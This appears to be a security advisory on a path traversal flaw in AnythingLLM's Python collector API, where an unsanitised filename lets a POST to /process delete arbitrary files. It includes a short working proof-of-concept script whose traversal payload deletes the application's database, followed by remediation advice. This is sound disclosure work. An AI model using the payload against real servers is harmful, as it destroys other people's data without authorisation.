The /process
endpoint of the python API (in collector/api.py
) exposes an endpoint waiting for a POST
request with a parameter named filename
:
@api.route("/process", methods=["POST"])
def process_file():
content = request.json
target_filename = content.get("filename")
print(f"Processing {target_filename}")
success, reason = process_single(WATCH_DIRECTORY, target_filename)
return json.dumps(
{"filename": target_filename, "success": success, "reason": reason}
)
Then, the filename
is passed to the process_single
function :
def process_single(directory, target_doc):
if os.path.isdir(f"{directory}/{target_doc}") or target_doc in RESERVED: return (False, "Not a file")
if os.path.exists(f"{directory}/{target_doc}") is False:
print(f"{directory}/{target_doc} does not exist.")
return (False, f"{directory}/{target_doc} does not exist.")
filename, fileext = os.path.splitext(target_doc)
if filename in ['.DS_Store'] or fileext == '': return False
if fileext == '.lock':
print(f"{filename} is locked - skipping until unlocked")
return (False, f"{filename} is locked - skipping until unlocked")
if fileext not in FILETYPES.keys():
print(f"{fileext} not a supported file type for conversion. It will not be processed.")
move_source(new_destination_filename=target_doc, failed=True, remove=True)
return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")
If filename
HAS a file extension and that extensionIS NOT among theses extensions :
FILETYPES = {
'.txt': as_text,
'.md': as_markdown,
'.pdf': as_pdf,
'.docx': as_docx,
'.odt': as_odt,
'.mbox': as_mbox,
}
and if the filename
points to an existing file, the following function is called (with failed=True, remove=True
) :
def move_source(working_dir='hotdir', new_destination_filename='', failed=False, remove=False):
if remove and os.path.exists(f"{working_dir}/{new_destination_filename}"):
print(f"{new_destination_filename} deleted from filesystem")
os.remove(f"{working_dir}/{new_destination_filename}")
return
Thus, the file is deleted.
However, since the parameter filename
is not sanitized against PATH TRAVERSAL, a filename such as ../../server/storage/anythingllm.db
can be used to remove the database of the website.
# PoC.py
import requests
if __name__ == "__main__":
server_ip = "127.0.0.1"
file_to_delete = "../../server/storage/anythingllm.db"
data = {"filename" : file_to_delete}
requests.post(f"http://{server_ip}:8888/process", json=data)
For file name parameters, Flask implement a function named secure_filename
to manage filename securely, documentation can be found here. The function os.path.basename
could also be used.
Moreover, it may be a better practice to use os.path.join
instead of concatenating strings using +
.
In the documentation (collector/README.md
), the following command is mentioned to run the Python API :
flask run --host '0.0.0.0' --port 8888
However, simply listening on 127.0.0.1
should be enough. The docker version seems ‘safe’ because only the port 3001 is exposed to the host (however it is still reachable from the docker0
interface on the host, but the attacker would need to be logged in the server).
But using the manual installation method, it may results in a Python API exposed to the internet. Here is an example of an instance exposed to the Internet on shodan :